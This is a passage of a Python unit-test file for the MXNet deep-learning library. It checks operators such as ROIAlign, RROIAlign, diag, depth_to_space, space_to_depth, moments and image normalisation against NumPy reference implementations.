-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
            # Loop over dtypes
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
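    # For example, float32 has a 24-bit significand, so flat indices above 2**24 (~16.7M) are no
    # longer exactly representable; with dim == 4 and entries up to 100 the flat index can approach
    # 100**4 = 1e8, hence the smaller randint(50) range used below.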
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
        shape2 = (-1,) + shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA is sometimes unable to determine the number of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
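    # bilinear_interpolate returns the interpolated value together with the four
    # (y, x, weight) triples that roialign_forward_backward uses to scatter gradients back into dx.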
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
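        # In position-sensitive mode every output bin (ph, pw) reads from its own group of input
        # channels, so the input must provide C_out * PH * PW channels (see c_in below).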
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
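    # For example, with blocksize=2 an input of shape (1, 4, 2, 2) maps to (1, 1, 4, 4):
    # each group of block**2 channels is rearranged into a block x block spatial tile.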
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
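    # space_to_depth is the inverse mapping: with blocksize=2 an input of shape (1, 1, 4, 4)
    # maps to (1, 4, 2, 2), folding each block x block spatial tile into block**2 channels.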
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
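    # With pooling_convention="same" the output length is ceil(input_length / stride),
    # independent of the kernel size, which is what the assertion below checks.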
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
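    # Note: for a numpy array x, x[:] is x itself, so the chained x[:][:][c] below is just x[c],
    # i.e. channel c of the CHW tensor; the mean/std are therefore applied per channel.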
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
